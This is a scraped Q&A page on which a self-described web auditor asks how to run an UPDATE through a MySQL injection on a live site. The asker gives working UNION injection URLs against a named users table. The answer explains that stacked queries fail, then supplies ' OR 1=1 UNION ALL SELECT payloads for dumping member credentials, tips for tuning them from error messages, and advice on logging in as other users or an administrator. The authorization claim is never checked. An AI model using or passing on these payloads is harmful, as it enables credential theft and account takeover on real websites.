开发者

Help using UPDATE in url (I'm a auditor)(MySQL time based)

问答 作者:

I am currently working auditing web pages. An audit project is a website that is vulnerable to sql injection.

Then for possible vulnerabilities in the web page I found one that compromises the database.

After searching potential vulnerabilities have used software to help me or rather I was easier to find all tables without losing much time to keep trying words one by one.

The problem is I can do SELECT but I can not update queries. I have no source code of the application they use, but I suspect they are using something.

$query = mysql_query("SELECT * FROM members WHERE user='".$_POST['user']."'");

But then I encounter the problem that mysql_query can not be put into two queries, namely this:

开发者_如何转开发$query = mysql_query("SELECT * FROM members WHERE user='".$_POST['user']."';UPDATE blablabla");

The query I'm using to inject something like this.(This query run correctly)

testpage.php?find=Search&
search=9.9'
+union+all+select+NULL,
(select+concat 
(users.username)
+from+`inya`.users+where+users.username="ckyli"+Order+by+username+limit+0,1)+,NULL,NULL+and+'x'='x’

then I want to update your query, the query is constructed that, the query fails because it does not change my login name

testpage.php?find=Search&search=9.9';UPDATE+users+SET+username=”pentest”+ where+username=”ckyli”+ and+first_name=”Alejandro”+ and+last_name=”Garcia”--

I'm a little confused on all I've found that using mysqli then i do not know how to operate it.

I've tried everything using load_file, union but maybe do not know how to use properly. I'm no security expert but I will defend well enough. My question is, would anyone be so kind to help me run my query update it?

Many thanks in advance.

You cannot update inside a select statement.
This is because MySQL(i)_ (the php-lib) does not allow you to run two queries.
You've already figured this out, nothing after the ; can be executed and if you start with a select you cannot get out of the select.

The object of the exercise now changes to getting user-ids and passwords.

You can do this with a union all injection. If you have a statement like this: 

$query = mysql_query("SELECT * FROM members WHERE user='".$_POST['user']."'");
                             ^         ^               ^
                             2         3               1

You can get a list of all members by doing.

' OR 1=1 UNION ALL SELECT * FROM members -- or
" OR 1=1 UNION ALL SELECT * FROM members -- or
') OR 1=1 UNION ALL SELECT * FROM members -- or .....
^
+--Must match with part 1 above.

Some experimentation will be required.
When exploiting unescaped queries it important to match both part 1 and part 2, or the query will fail, you also need to select from an existing table (part 3).

If you can force the webapp to generate an error message that will help a lot, because if you get an error like:

Error: The used select statements have a different number of columns

Or the framework is even nice enough to give you the text of the query, you don't have to guess so much.

Once you have user credentials for a different user, you can log in with that data and access their data. If you have the superuser account data, you can even login to the administrator console and alter stuff.

继续阅读:code-injectionsecuritysql

更多精彩内容

0

上一篇:

下一篇:

精彩评论

暂无评论...
登录 注册
Qedev.com
验证码 换一张
取 消

最新问答

问答排行榜

法律声明:本站内容均为网友上传,网站举办方负责审核和监督,

如存在版权或非法内容,欢迎举报,我们将尽快予以删除。

Copyright © 2018-2020 开发者. All rights reserved.

Powered by 开发者

ICP备案号: 京ICP备10032868号-9